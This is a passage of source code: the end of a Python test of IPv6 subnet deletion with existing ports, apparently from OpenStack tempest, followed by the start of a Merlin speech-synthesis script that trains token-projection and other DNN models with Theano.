ipv6_ra_mode='dhcpv6-stateless',
ipv6_address_mode='dhcpv6-stateless')
def _test_delete_subnet_with_ports(self, mode):
"""Create subnet and delete it with existing ports"""
slaac_network = self.create_network()
subnet_slaac = self.create_subnet(slaac_network,
**{'ipv6_ra_mode': mode,
'ipv6_address_mode': mode})
port = self.create_port(slaac_network)
self.assertIsNotNone(port['fixed_ips'][0]['ip_address'])
self.client.delete_subnet(subnet_slaac['id'])
self.subnets.pop()
subnets = self.client.list_subnets()
subnet_ids = [subnet['id'] for subnet in subnets['subnets']]
self.assertNotIn(subnet_slaac['id'], subnet_ids,
"Subnet wasn't deleted")
self.assertRaisesRegexp(
lib_exc.Conflict,
"There are one or more ports still in use on the network",
self.client.delete_network,
slaac_network['id'])
@test.attr(type='smoke')
@test.idempotent_id('88554555-ebf8-41ef-9300-4926d45e06e9')
def test_create_delete_slaac_subnet_with_ports(self):
"""Test deleting subnet with SLAAC ports
Create subnet with SLAAC, create ports in network
and then you shall be able to delete subnet without port
deletion. But you still can not delete the network.
"""
self._test_delete_subnet_with_ports("slaac")
@test.attr(type='smoke')
@test.idempotent_id('2de6ab5a-fcf0-4144-9813-f91a940291f1')
def test_create_delete_stateless_subnet_with_ports(self):
"""Test deleting subnet with DHCPv6 stateless ports
Create subnet with DHCPv6 stateless, create ports in network
and then you shall be able to delete subnet without port
deletion. But you still can not delete the network.
"""
self._test_delete_subnet_with_ports("dhcpv6-stateless")
| apache-2.0 |
bajibabu/merlin | src/work_in_progress/oliver/run_tpdnn.py | 2 | 101142 |
import pickle
import gzip
import os, sys, errno
import time
import math
# numpy & theano imports need to be done in this order (only for some numpy installations, not sure why)
import numpy
# we need to explicitly import this in some cases, not sure why this doesn't get imported with numpy itself
import numpy.distutils.__config__
# and only after that can we import theano
import theano
from utils.providers import ListDataProviderWithProjectionIndex, expand_projection_inputs, get_unexpanded_projection_inputs # ListDataProvider
from frontend.label_normalisation import HTSLabelNormalisation, XMLLabelNormalisation
from frontend.silence_remover import SilenceRemover
from frontend.silence_remover import trim_silence
from frontend.min_max_norm import MinMaxNormalisation
#from frontend.acoustic_normalisation import CMPNormalisation
from frontend.acoustic_composition import AcousticComposition
from frontend.parameter_generation import ParameterGeneration
#from frontend.feature_normalisation_base import FeatureNormBase
from frontend.mean_variance_norm import MeanVarianceNorm
# the new class for label composition and normalisation
from frontend.label_composer import LabelComposer
import configuration
from models.dnn import DNN
from models.tpdnn import TokenProjectionDNN
from models.ms_dnn import MultiStreamDNN
from models.ms_dnn_gv import MultiStreamDNNGv
from models.sdae import StackedDenoiseAutoEncoder
from utils.compute_distortion import DistortionComputation, IndividualDistortionComp
from utils.generate import generate_wav
from utils.learn_rates import ExpDecreaseLearningRate
#import matplotlib.pyplot as plt
# our custom logging class that can also plot
#from logplot.logging_plotting import LoggerPlotter, MultipleTimeSeriesPlot, SingleWeightMatrixPlot
from logplot.logging_plotting import LoggerPlotter, MultipleSeriesPlot, SingleWeightMatrixPlot
import logging # as logging
import logging.config
import io
## This should always be True -- tidy up later
expand_by_minibatch = True
if expand_by_minibatch:
proj_type = 'int32'
else:
proj_type = theano.config.floatX
def extract_file_id_list(file_list):
file_id_list = []
for file_name in file_list:
file_id = os.path.basename(os.path.splitext(file_name)[0])
file_id_list.append(file_id)
return file_id_list
def read_file_list(file_name):
logger = logging.getLogger("read_file_list")
file_lists = []
fid = open(file_name)
for line in fid.readlines():
line = line.strip()
if len(line) < 1:
continue
file_lists.append(line)
fid.close()
logger.debug('Read file list from %s' % file_name)
return file_lists
def make_output_file_list(out_dir, in_file_lists):
out_file_lists = []
for in_file_name in in_file_lists:
file_id = os.path.basename(in_file_name)
out_file_name = out_dir + '/' + file_id
out_file_lists.append(out_file_name)
return out_file_lists
def prepare_file_path_list(file_id_list, file_dir, file_extension, new_dir_switch=True):
if not os.path.exists(file_dir) and new_dir_switch:
os.makedirs(file_dir)
file_name_list = []
for file_id in file_id_list:
file_name = file_dir + '/' + file_id + file_extension
file_name_list.append(file_name)
return file_name_list
def visualize_dnn(dnn):
layer_num = len(dnn.params) / 2 ## including input and output
for i in range(layer_num):
fig_name = 'Activation weights W' + str(i)
fig_title = 'Activation weights of W' + str(i)
xlabel = 'Neuron index of hidden layer ' + str(i)
ylabel = 'Neuron index of hidden layer ' + str(i+1)
if i == 0:
xlabel = 'Input feature index'
if i == layer_num-1:
ylabel = 'Output feature index'
logger.create_plot(fig_name, SingleWeightMatrixPlot)
plotlogger.add_plot_point(fig_name, fig_name, dnn.params[i*2].get_value(borrow=True).T)
plotlogger.save_plot(fig_name, title=fig_name, xlabel=xlabel, ylabel=ylabel)
## Function for training projection and non-projection parts at same time
def train_DNN(train_xy_file_list, valid_xy_file_list, \
nnets_file_name, n_ins, n_outs, ms_outs, hyper_params, buffer_size, plot=False):
# get loggers for this function
# this one writes to both console and file
logger = logging.getLogger("main.train_DNN")
logger.debug('Starting train_DNN')
if plot:
# this one takes care of plotting duties
plotlogger = logging.getLogger("plotting")
# create an (empty) plot of training convergence, ready to receive data points
logger.create_plot('training convergence',MultipleSeriesPlot)
try:
assert numpy.sum(ms_outs) == n_outs
except AssertionError:
logger.critical('the summation of multi-stream outputs does not equal to %d' %(n_outs))
raise
####parameters#####
finetune_lr = float(hyper_params['learning_rate'])
training_epochs = int(hyper_params['training_epochs'])
batch_size = int(hyper_params['batch_size'])
l1_reg = float(hyper_params['l1_reg'])
l2_reg = float(hyper_params['l2_reg'])
private_l2_reg = float(hyper_params['private_l2_reg'])
warmup_epoch = int(hyper_params['warmup_epoch'])
momentum = float(hyper_params['momentum'])
warmup_momentum = float(hyper_params['warmup_momentum'])
hidden_layers_sizes = hyper_params['hidden_layers_sizes']
stream_weights = hyper_params['stream_weights']
private_hidden_sizes = hyper_params['private_hidden_sizes']
buffer_utt_size = buffer_size
early_stop_epoch = int(hyper_params['early_stop_epochs'])
hidden_activation = hyper_params['hidden_activation']
output_activation = hyper_params['output_activation']
stream_lr_weights = hyper_params['stream_lr_weights']
use_private_hidden = hyper_params['use_private_hidden']
model_type = hyper_params['model_type']
index_to_project = hyper_params['index_to_project']
projection_insize = hyper_params['projection_insize']
projection_outsize = hyper_params['projection_outsize']
## use a switch to turn on pretraining
## pretraining may not help too much, if this case, we turn it off to save time
do_pretraining = hyper_params['do_pretraining']
pretraining_epochs = int(hyper_params['pretraining_epochs'])
pretraining_lr = float(hyper_params['pretraining_lr'])
initial_projection_distrib = hyper_params['initial_projection_distrib']
buffer_size = int(buffer_size / batch_size) * batch_size
###################
(train_x_file_list, train_y_file_list) = train_xy_file_list
(valid_x_file_list, valid_y_file_list) = valid_xy_file_list
logger.debug('Creating training data provider')
train_data_reader = ListDataProviderWithProjectionIndex(x_file_list = train_x_file_list, y_file_list = train_y_file_list, n_ins = n_ins, n_outs = n_outs, buffer_size = buffer_size, shuffle = True, index_to_project=index_to_project, projection_insize=projection_insize, indexes_only=expand_by_minibatch)
logger.debug('Creating validation data provider')
valid_data_reader = ListDataProviderWithProjectionIndex(x_file_list = valid_x_file_list, y_file_list = valid_y_file_list, n_ins = n_ins, n_outs = n_outs, buffer_size = buffer_size, shuffle = False, index_to_project=index_to_project, projection_insize=projection_insize, indexes_only=expand_by_minibatch)
shared_train_set_xy, temp_train_set_x, temp_train_set_x_proj, temp_train_set_y = train_data_reader.load_next_partition_with_projection()
train_set_x, train_set_x_proj, train_set_y = shared_train_set_xy
shared_valid_set_xy, temp_valid_set_x, temp_valid_set_x_proj, temp_valid_set_y = valid_data_reader.load_next_partition_with_projection()
valid_set_x, valid_set_x_proj, valid_set_y = shared_valid_set_xy
train_data_reader.reset()
valid_data_reader.reset()
##temporally we use the training set as pretrain_set_x.
##we need to support any data for pretraining
pretrain_set_x = train_set_x
# numpy random generator
numpy_rng = numpy.random.RandomState(123)
logger.info('building the model')
dnn_model = None
pretrain_fn = None ## not all the model support pretraining right now
train_fn = None
valid_fn = None
valid_model = None ## valid_fn and valid_model are the same. reserve to computer multi-stream distortion
if model_type == 'DNN':
dnn_model = DNN(numpy_rng=numpy_rng, n_ins=n_ins, n_outs = n_outs,
l1_reg = l1_reg, l2_reg = l2_reg,
hidden_layers_sizes = hidden_layers_sizes,
hidden_activation = hidden_activation,
output_activation = output_activation)
train_fn, valid_fn = dnn_model.build_finetune_functions(
(train_set_x, train_set_y), (valid_set_x, valid_set_y), batch_size=batch_size)
elif model_type == 'TPDNN':
dnn_model = TokenProjectionDNN(numpy_rng=numpy_rng, n_ins=n_ins, n_outs = n_outs,
l1_reg = l1_reg, l2_reg = l2_reg,
hidden_layers_sizes = hidden_layers_sizes,
hidden_activation = hidden_activation,
output_activation = output_activation,
projection_insize=projection_insize, projection_outsize=projection_outsize,
expand_by_minibatch=expand_by_minibatch, initial_projection_distrib=initial_projection_distrib)
train_all_fn, train_subword_fn, train_word_fn, infer_projections_fn, valid_fn, valid_score_i = \
dnn_model.build_finetune_functions(
(train_set_x, train_set_x_proj, train_set_y),
(valid_set_x, valid_set_x_proj, valid_set_y), batch_size=batch_size)
elif model_type == 'SDAE':
##basic model is ready.
##if corruption levels is set to zero. it becomes normal autoencoder
dnn_model = StackedDenoiseAutoEncoder(numpy_rng=numpy_rng, n_ins=n_ins, n_outs = n_outs,
l1_reg = l1_reg, l2_reg = l2_reg,
hidden_layers_sizes = hidden_layers_sizes)
if do_pretraining:
pretraining_fn = dnn_model.pretraining_functions(pretrain_set_x, batch_size)
train_fn, valid_fn = dnn_model.build_finetune_functions(
(train_set_x, train_set_y), (valid_set_x, valid_set_y), batch_size=batch_size)
elif model_type == 'MSDNN': ##model is ready, but the hyper-parameters are not optimised.
dnn_model = MultiStreamDNN(numpy_rng=numpy_rng, n_ins=n_ins, ms_outs=ms_outs,
l1_reg = l1_reg, l2_reg = l2_reg,
hidden_layers_sizes = hidden_layers_sizes,
stream_weights = stream_weights,
hidden_activation = hidden_activation,
output_activation = output_activation)
train_fn, valid_fn = dnn_model.build_finetune_functions(
(train_set_x, train_set_y), (valid_set_x, valid_set_y),
batch_size=batch_size, lr_weights = stream_lr_weights)
elif model_type == 'MSDNN_GV': ## not fully ready
dnn_model = MultiStreamDNNGv(numpy_rng=numpy_rng, n_ins=n_ins, ms_outs=ms_outs,
l1_reg = l1_reg, l2_reg = l2_reg,
hidden_layers_sizes = hidden_layers_sizes,
stream_weights = stream_weights,
hidden_activation = hidden_activation,
output_activation = output_activation)
train_fn, valid_fn = dnn_model.build_finetune_functions(
(train_set_x, train_set_y), (valid_set_x, valid_set_y),
batch_size=batch_size, lr_weights = stream_lr_weights)
else:
logger.critical('%s type NN model is not supported!' %(model_type))
raise
## if pretraining is supported in one model, add the switch here
## be careful to use autoencoder for pretraining here:
## for SDAE, currently only sigmoid function is supported in the hidden layers, as our input is scaled to [0, 1]
## however, tanh works better and converge fast in finetuning
##
## Will extend this soon...
if do_pretraining and model_type == 'SDAE':
logger.info('pretraining the %s model' %(model_type))
corruption_level = 0.0
## in SDAE we do layer-wise pretraining using autoencoders
for i in range(dnn_model.n_layers):
for epoch in range(pretraining_epochs):
sub_start_time = time.clock()
pretrain_loss = []
while (not train_data_reader.is_finish()):
shared_train_set_xy, temp_train_set_x, temp_train_set_y = train_data_reader.load_next_partition()
pretrain_set_x.set_value(numpy.asarray(temp_train_set_x, dtype=theano.config.floatX), borrow=True)
n_train_batches = pretrain_set_x.get_value().shape[0] / batch_size
for batch_index in range(n_train_batches):
pretrain_loss.append(pretraining_fn[i](index=batch_index,
corruption=corruption_level,
learning_rate=pretraining_lr))
sub_end_time = time.clock()
logger.info('Pre-training layer %i, epoch %d, cost %s, time spent%.2f' % (i+1, epoch+1, numpy.mean(pretrain_loss), (sub_end_time - sub_start_time)))
train_data_reader.reset()
logger.info('fine-tuning the %s model' %(model_type))
start_time = time.clock()
best_dnn_model = dnn_model
best_validation_loss = sys.float_info.max
previous_loss = sys.float_info.max
early_stop = 0
epoch = 0
previous_finetune_lr = finetune_lr
while (epoch < training_epochs):
epoch = epoch + 1
current_momentum = momentum
current_finetune_lr = finetune_lr
if epoch <= warmup_epoch:
current_finetune_lr = finetune_lr
current_momentum = warmup_momentum
else:
current_finetune_lr = previous_finetune_lr * 0.5
previous_finetune_lr = current_finetune_lr
train_error = []
sub_start_time = time.clock()
while (not train_data_reader.is_finish()):
shared_train_set_xy, temp_train_set_x, temp_train_set_x_proj, temp_train_set_y = train_data_reader.load_next_partition_with_projection()
train_set_x.set_value(numpy.asarray(temp_train_set_x, dtype=theano.config.floatX), borrow=True)
train_set_x_proj.set_value(numpy.asarray(temp_train_set_x_proj, dtype=proj_type), borrow=True)
train_set_y.set_value(numpy.asarray(temp_train_set_y, dtype=theano.config.floatX), borrow=True)
n_train_batches = train_set_x.get_value().shape[0] / batch_size
logger.debug('this partition: %d frames (divided into %d batches of size %d)' %(train_set_x.get_value(borrow=True).shape[0], n_train_batches, batch_size) )
for minibatch_index in range(n_train_batches):
this_train_error = train_all_fn(minibatch_index, current_finetune_lr, current_momentum)
train_error.append(this_train_error)
if numpy.isnan(this_train_error):
logger.warning('training error over minibatch %d of %d was %s' % (minibatch_index+1,n_train_batches,this_train_error) )
train_data_reader.reset()
## osw -- getting validation error from a forward pass in a single batch
## exausts memory when using 20k projected vocab -- also use minibatches
logger.debug('calculating validation loss')
valid_error = []
n_valid_batches = valid_set_x.get_value().shape[0] / batch_size
for minibatch_index in range(n_valid_batches):
v_loss = valid_score_i(minibatch_index)
valid_error.append(v_loss)
this_validation_loss = numpy.mean(valid_error)
# this has a possible bias if the minibatches were not all of identical size
# but it should not be siginficant if minibatches are small
this_train_valid_loss = numpy.mean(train_error)
sub_end_time = time.clock()
loss_difference = this_validation_loss - previous_loss
logger.info('BASIC epoch %i, validation error %f, train error %f time spent %.2f' %(epoch, this_validation_loss, this_train_valid_loss, (sub_end_time - sub_start_time)))
if plot:
plotlogger.add_plot_point('training convergence','validation set',(epoch,this_validation_loss))
plotlogger.add_plot_point('training convergence','training set',(epoch,this_train_valid_loss))
plotlogger.save_plot('training convergence',title='Progress of training and validation error',xlabel='epochs',ylabel='error')
if this_validation_loss < best_validation_loss:
best_dnn_model = dnn_model
best_validation_loss = this_validation_loss
logger.debug('validation loss decreased, so saving model')
early_stop = 0
else:
logger.debug('validation loss did not improve')
dbn = best_dnn_model
early_stop += 1
if early_stop > early_stop_epoch:
# too many consecutive epochs without surpassing the best model
logger.debug('stopping early')
break
if math.isnan(this_validation_loss):
break
previous_loss = this_validation_loss
### Save projection values:
if cfg.hyper_params['model_type'] == 'TPDNN':
if not os.path.isdir(cfg.projection_weights_output_dir):
os.mkdir(cfg.projection_weights_output_dir)
weights = dnn_model.get_projection_weights()
fname = os.path.join(cfg.projection_weights_output_dir, 'proj_BASIC_epoch_%s'%(epoch))
numpy.savetxt(fname, weights)
end_time = time.clock()
pickle.dump(best_dnn_model, open(nnets_file_name, 'wb'))
logger.info('overall training time: %.2fm validation error %f' % ((end_time - start_time) / 60., best_validation_loss))
if plot:
plotlogger.save_plot('training convergence',title='Final training and validation error',xlabel='epochs',ylabel='error')
## Function for training all model on train data as well as simultaneously
## inferring proj weights on dev data.
# in each epoch do:
# train_all_fn()
# infer_projections_fn() ## <-- updates proj for devset and gives validation loss
def train_DNN_and_traindev_projections(train_xy_file_list, valid_xy_file_list, \
nnets_file_name, n_ins, n_outs, ms_outs, hyper_params, buffer_size, plot=False):
# get loggers for this function
# this one writes to both console and file
logger = logging.getLogger("main.train_DNN")
logger.debug('Starting train_DNN')
if plot:
# this one takes care of plotting duties
plotlogger = logging.getLogger("plotting")
# create an (empty) plot of training convergence, ready to receive data points
logger.create_plot('training convergence',MultipleSeriesPlot)
try:
assert numpy.sum(ms_outs) == n_outs
except AssertionError:
logger.critical('the summation of multi-stream outputs does not equal to %d' %(n_outs))
raise
####parameters#####
finetune_lr = float(hyper_params['learning_rate'])
training_epochs = int(hyper_params['training_epochs'])
batch_size = int(hyper_params['batch_size'])
l1_reg = float(hyper_params['l1_reg'])
l2_reg = float(hyper_params['l2_reg'])
private_l2_reg = float(hyper_params['private_l2_reg'])
warmup_epoch = int(hyper_params['warmup_epoch'])
momentum = float(hyper_params['momentum'])
warmup_momentum = float(hyper_params['warmup_momentum'])
hidden_layers_sizes = hyper_params['hidden_layers_sizes']
stream_weights = hyper_params['stream_weights']
private_hidden_sizes = hyper_params['private_hidden_sizes']
buffer_utt_size = buffer_size
early_stop_epoch = int(hyper_params['early_stop_epochs'])
hidden_activation = hyper_params['hidden_activation']
output_activation = hyper_params['output_activation']
stream_lr_weights = hyper_params['stream_lr_weights']
use_private_hidden = hyper_params['use_private_hidden']
model_type = hyper_params['model_type']
index_to_project = hyper_params['index_to_project']
projection_insize = hyper_params['projection_insize']
projection_outsize = hyper_params['projection_outsize']
## use a switch to turn on pretraining
## pretraining may not help too much, if this case, we turn it off to save time
do_pretraining = hyper_params['do_pretraining']
pretraining_epochs = int(hyper_params['pretraining_epochs'])
pretraining_lr = float(hyper_params['pretraining_lr'])
initial_projection_distrib = hyper_params['initial_projection_distrib']
buffer_size = int(buffer_size / batch_size) * batch_size
###################
(train_x_file_list, train_y_file_list) = train_xy_file_list
(valid_x_file_list, valid_y_file_list) = valid_xy_file_list
logger.debug('Creating training data provider')
train_data_reader = ListDataProviderWithProjectionIndex(x_file_list = train_x_file_list, y_file_list = train_y_file_list, n_ins = n_ins, n_outs = n_outs, buffer_size = buffer_size, shuffle = True, index_to_project=index_to_project, projection_insize=projection_insize, indexes_only=expand_by_minibatch)
logger.debug('Creating validation data provider')
valid_data_reader = ListDataProviderWithProjectionIndex(x_file_list = valid_x_file_list, y_file_list = valid_y_file_list, n_ins = n_ins, n_outs = n_outs, buffer_size = buffer_size, shuffle = False, index_to_project=index_to_project, projection_insize=projection_insize, indexes_only=expand_by_minibatch)
shared_train_set_xy, temp_train_set_x, temp_train_set_x_proj, temp_train_set_y = train_data_reader.load_next_partition_with_projection()
train_set_x, train_set_x_proj, train_set_y = shared_train_set_xy
shared_valid_set_xy, temp_valid_set_x, temp_valid_set_x_proj, temp_valid_set_y = valid_data_reader.load_next_partition_with_projection()
valid_set_x, valid_set_x_proj, valid_set_y = shared_valid_set_xy
train_data_reader.reset()
valid_data_reader.reset()
##temporally we use the training set as pretrain_set_x.
##we need to support any data for pretraining
pretrain_set_x = train_set_x
# numpy random generator
numpy_rng = numpy.random.RandomState(123)
logger.info('building the model')
dnn_model = None
pretrain_fn = None ## not all the model support pretraining right now
train_fn = None
valid_fn = None
valid_model = None ## valid_fn and valid_model are the same. reserve to computer multi-stream distortion
if model_type == 'DNN':
dnn_model = DNN(numpy_rng=numpy_rng, n_ins=n_ins, n_outs = n_outs,
l1_reg = l1_reg, l2_reg = l2_reg,
hidden_layers_sizes = hidden_layers_sizes,
hidden_activation = hidden_activation,
output_activation = output_activation)
train_fn, valid_fn = dnn_model.build_finetune_functions(
(train_set_x, train_set_y), (valid_set_x, valid_set_y), batch_size=batch_size)
elif model_type == 'TPDNN':
dnn_model = TokenProjectionDNN(numpy_rng=numpy_rng, n_ins=n_ins, n_outs = n_outs,
l1_reg = l1_reg, l2_reg = l2_reg,
hidden_layers_sizes = hidden_layers_sizes,
hidden_activation = hidden_activation,
output_activation = output_activation,
projection_insize=projection_insize, projection_outsize=projection_outsize,
expand_by_minibatch=expand_by_minibatch, initial_projection_distrib=initial_projection_distrib)
train_all_fn, train_subword_fn, train_word_fn, infer_projections_fn, valid_fn, valid_score_i = \
dnn_model.build_finetune_functions(
(train_set_x, train_set_x_proj, train_set_y),
(valid_set_x, valid_set_x_proj, valid_set_y), batch_size=batch_size)
elif model_type == 'SDAE':
##basic model is ready.
##if corruption levels is set to zero. it becomes normal autoencoder
dnn_model = StackedDenoiseAutoEncoder(numpy_rng=numpy_rng, n_ins=n_ins, n_outs = n_outs,
l1_reg = l1_reg, l2_reg = l2_reg,
hidden_layers_sizes = hidden_layers_sizes)
if do_pretraining:
pretraining_fn = dnn_model.pretraining_functions(pretrain_set_x, batch_size)
train_fn, valid_fn = dnn_model.build_finetune_functions(
(train_set_x, train_set_y), (valid_set_x, valid_set_y), batch_size=batch_size)
elif model_type == 'MSDNN': ##model is ready, but the hyper-parameters are not optimised.
dnn_model = MultiStreamDNN(numpy_rng=numpy_rng, n_ins=n_ins, ms_outs=ms_outs,
l1_reg = l1_reg, l2_reg = l2_reg,
hidden_layers_sizes = hidden_layers_sizes,
stream_weights = stream_weights,
hidden_activation = hidden_activation,
output_activation = output_activation)
train_fn, valid_fn = dnn_model.build_finetune_functions(
(train_set_x, train_set_y), (valid_set_x, valid_set_y),
batch_size=batch_size, lr_weights = stream_lr_weights)
elif model_type == 'MSDNN_GV': ## not fully ready
dnn_model = MultiStreamDNNGv(numpy_rng=numpy_rng, n_ins=n_ins, ms_outs=ms_outs,
l1_reg = l1_reg, l2_reg = l2_reg,
hidden_layers_sizes = hidden_layers_sizes,
stream_weights = stream_weights,
hidden_activation = hidden_activation,
output_activation = output_activation)
train_fn, valid_fn = dnn_model.build_finetune_functions(
(train_set_x, train_set_y), (valid_set_x, valid_set_y),
batch_size=batch_size, lr_weights = stream_lr_weights)
else:
logger.critical('%s type NN model is not supported!' %(model_type))
raise
## if pretraining is supported in one model, add the switch here
## be careful to use autoencoder for pretraining here:
## for SDAE, currently only sigmoid function is supported in the hidden layers, as our input is scaled to [0, 1]
## however, tanh works better and converge fast in finetuning
##
## Will extend this soon...
if do_pretraining and model_type == 'SDAE':
logger.info('pretraining the %s model' %(model_type))
corruption_level = 0.0
## in SDAE we do layer-wise pretraining using autoencoders
for i in range(dnn_model.n_layers):
for epoch in range(pretraining_epochs):
sub_start_time = time.clock()
pretrain_loss = []
while (not train_data_reader.is_finish()):
shared_train_set_xy, temp_train_set_x, temp_train_set_y = train_data_reader.load_next_partition()
pretrain_set_x.set_value(numpy.asarray(temp_train_set_x, dtype=theano.config.floatX), borrow=True)
n_train_batches = pretrain_set_x.get_value().shape[0] / batch_size
for batch_index in range(n_train_batches):
pretrain_loss.append(pretraining_fn[i](index=batch_index,
corruption=corruption_level,
learning_rate=pretraining_lr))
sub_end_time = time.clock()
logger.info('Pre-training layer %i, epoch %d, cost %s, time spent%.2f' % (i+1, epoch+1, numpy.mean(pretrain_loss), (sub_end_time - sub_start_time)))
train_data_reader.reset()
logger.info('fine-tuning the %s model' %(model_type))
start_time = time.clock()
best_dnn_model = dnn_model
best_validation_loss = sys.float_info.max
previous_loss = sys.float_info.max
early_stop = 0
epoch = 0
previous_finetune_lr = finetune_lr
##dnn_model.zero_projection_weights()
while (epoch < training_epochs):
epoch = epoch + 1
current_momentum = momentum
current_finetune_lr = finetune_lr
if epoch <= warmup_epoch:
current_finetune_lr = finetune_lr
current_momentum = warmup_momentum
else:
current_finetune_lr = previous_finetune_lr * 0.5
previous_finetune_lr = current_finetune_lr
train_error = []
sub_start_time = time.clock()
while (not train_data_reader.is_finish()):
shared_train_set_xy, temp_train_set_x, temp_train_set_x_proj, temp_train_set_y = train_data_reader.load_next_partition_with_projection()
train_set_x.set_value(numpy.asarray(temp_train_set_x, dtype=theano.config.floatX), borrow=True)
train_set_x_proj.set_value(numpy.asarray(temp_train_set_x_proj, dtype=proj_type), borrow=True)
train_set_y.set_value(numpy.asarray(temp_train_set_y, dtype=theano.config.floatX), borrow=True)
n_train_batches = train_set_x.get_value().shape[0] / batch_size
logger.debug('this partition: %d frames (divided into %d batches of size %d)' %(train_set_x.get_value(borrow=True).shape[0], n_train_batches, batch_size) )
for minibatch_index in range(n_train_batches):
this_train_error = train_all_fn(minibatch_index, current_finetune_lr, current_momentum)
train_error.append(this_train_error)
if numpy.isnan(this_train_error):
logger.warning('training error over minibatch %d of %d was %s' % (minibatch_index+1,n_train_batches,this_train_error) )
train_data_reader.reset()
## infer validation weights before getting validation error:
## osw -- inferring word reps on validation set in a forward pass in a single batch
## exausts memory when using 20k projected vocab -- also use minibatches
logger.debug('infer word representations for validation set')
valid_error = []
n_valid_batches = valid_set_x.get_value().shape[0] / batch_size
for minibatch_index in range(n_valid_batches):
v_loss = infer_projections_fn(minibatch_index, current_finetune_lr, current_momentum)
valid_error.append(v_loss)
## this function also give us validation loss:
this_validation_loss = numpy.mean(valid_error)
'''
## osw -- getting validation error from a forward pass in a single batch
## exausts memory when using 20k projected vocab -- also use minibatches
logger.debug('calculating validation loss')
valid_error = []
n_valid_batches = valid_set_x.get_value().shape[0] / batch_size
for minibatch_index in xrange(n_valid_batches):
v_loss = valid_score_i(minibatch_index)
valid_error.append(v_loss)
this_validation_loss = numpy.mean(valid_error)
'''
# this has a possible bias if the minibatches were not all of identical size
# but it should not be siginficant if minibatches are small
this_train_valid_loss = numpy.mean(train_error)
sub_end_time = time.clock()
loss_difference = this_validation_loss - previous_loss
logger.info('BASIC epoch %i, validation error %f, train error %f time spent %.2f' %(epoch, this_validation_loss, this_train_valid_loss, (sub_end_time - sub_start_time)))
if plot:
plotlogger.add_plot_point('training convergence','validation set',(epoch,this_validation_loss))
plotlogger.add_plot_point('training convergence','training set',(epoch,this_train_valid_loss))
plotlogger.save_plot('training convergence',title='Progress of training and validation error',xlabel='epochs',ylabel='error')
if this_validation_loss < best_validation_loss:
best_dnn_model = dnn_model
best_validation_loss = this_validation_loss
logger.debug('validation loss decreased, so saving model')
early_stop = 0
else:
logger.debug('validation loss did not improve')
dbn = best_dnn_model
early_stop += 1
if early_stop > early_stop_epoch:
# too many consecutive epochs without surpassing the best model
logger.debug('stopping early')
break
if math.isnan(this_validation_loss):
break
previous_loss = this_validation_loss
### Save projection values:
if cfg.hyper_params['model_type'] == 'TPDNN':
if not os.path.isdir(cfg.projection_weights_output_dir):
os.mkdir(cfg.projection_weights_output_dir)
weights = dnn_model.get_projection_weights()
fname = os.path.join(cfg.projection_weights_output_dir, 'proj_BASIC_epoch_%s'%(epoch))
numpy.savetxt(fname, weights)
end_time = time.clock()
pickle.dump(best_dnn_model, open(nnets_file_name, 'wb'))
logger.info('overall training time: %.2fm validation error %f' % ((end_time - start_time) / 60., best_validation_loss))
if plot:
plotlogger.save_plot('training convergence',title='Final training and validation error',xlabel='epochs',ylabel='error')
## Function for training the non-projection part only
def train_basic_DNN(train_xy_file_list, valid_xy_file_list, \
nnets_file_name, n_ins, n_outs, ms_outs, hyper_params, buffer_size, plot=False):
# get loggers for this function
# this one writes to both console and file
logger = logging.getLogger("main.train_DNN")
logger.debug('Starting train_DNN')
if plot:
# this one takes care of plotting duties
plotlogger = logging.getLogger("plotting")
# create an (empty) plot of training convergence, ready to receive data points
logger.create_plot('training convergence',MultipleSeriesPlot)
try:
assert numpy.sum(ms_outs) == n_outs
except AssertionError:
logger.critical('the summation of multi-stream outputs does not equal to %d' %(n_outs))
raise
####parameters#####
finetune_lr = float(hyper_params['learning_rate'])
training_epochs = int(hyper_params['training_epochs'])
batch_size = int(hyper_params['batch_size'])
l1_reg = float(hyper_params['l1_reg'])
l2_reg = float(hyper_params['l2_reg'])
private_l2_reg = float(hyper_params['private_l2_reg'])
warmup_epoch = int(hyper_params['warmup_epoch'])
momentum = float(hyper_params['momentum'])
warmup_momentum = float(hyper_params['warmup_momentum'])
hidden_layers_sizes = hyper_params['hidden_layers_sizes']
stream_weights = hyper_params['stream_weights']
private_hidden_sizes = hyper_params['private_hidden_sizes']
buffer_utt_size = buffer_size
early_stop_epoch = int(hyper_params['early_stop_epochs'])
hidden_activation = hyper_params['hidden_activation']
output_activation = hyper_params['output_activation']
stream_lr_weights = hyper_params['stream_lr_weights']
use_private_hidden = hyper_params['use_private_hidden']
model_type = hyper_params['model_type']
index_to_project = hyper_params['index_to_project']
projection_insize = hyper_params['projection_insize']
projection_outsize = hyper_params['projection_outsize']
## use a switch to turn on pretraining
## pretraining may not help too much, if this case, we turn it off to save time
do_pretraining = hyper_params['do_pretraining']
pretraining_epochs = int(hyper_params['pretraining_epochs'])
pretraining_lr = float(hyper_params['pretraining_lr'])
initial_projection_distrib = hyper_params['initial_projection_distrib']
buffer_size = int(buffer_size / batch_size) * batch_size
###################
(train_x_file_list, train_y_file_list) = train_xy_file_list
(valid_x_file_list, valid_y_file_list) = valid_xy_file_list
logger.debug('Creating training data provider')
train_data_reader = ListDataProviderWithProjectionIndex(x_file_list = train_x_file_list, y_file_list = train_y_file_list, n_ins = n_ins, n_outs = n_outs, buffer_size = buffer_size, shuffle = True, index_to_project=index_to_project, projection_insize=projection_insize, indexes_only=expand_by_minibatch)
logger.debug('Creating validation data provider')
valid_data_reader = ListDataProviderWithProjectionIndex(x_file_list = valid_x_file_list, y_file_list = valid_y_file_list, n_ins = n_ins, n_outs = n_outs, buffer_size = buffer_size, shuffle = False, index_to_project=index_to_project, projection_insize=projection_insize, indexes_only=expand_by_minibatch)
shared_train_set_xy, temp_train_set_x, temp_train_set_x_proj, temp_train_set_y = train_data_reader.load_next_partition_with_projection()
train_set_x, train_set_x_proj, train_set_y = shared_train_set_xy
shared_valid_set_xy, temp_valid_set_x, temp_valid_set_x_proj, temp_valid_set_y = valid_data_reader.load_next_partition_with_projection()
valid_set_x, valid_set_x_proj, valid_set_y = shared_valid_set_xy
train_data_reader.reset()
valid_data_reader.reset()
##temporally we use the training set as pretrain_set_x.
##we need to support any data for pretraining
pretrain_set_x = train_set_x
# numpy random generator
numpy_rng = numpy.random.RandomState(123)
logger.info('building the model')
dnn_model = None
pretrain_fn = None ## not all the model support pretraining right now
train_fn = None
valid_fn = None
valid_model = None ## valid_fn and valid_model are the same. reserve to computer multi-stream distortion
if model_type == 'DNN':
dnn_model = DNN(numpy_rng=numpy_rng, n_ins=n_ins, n_outs = n_outs,
l1_reg = l1_reg, l2_reg = l2_reg,
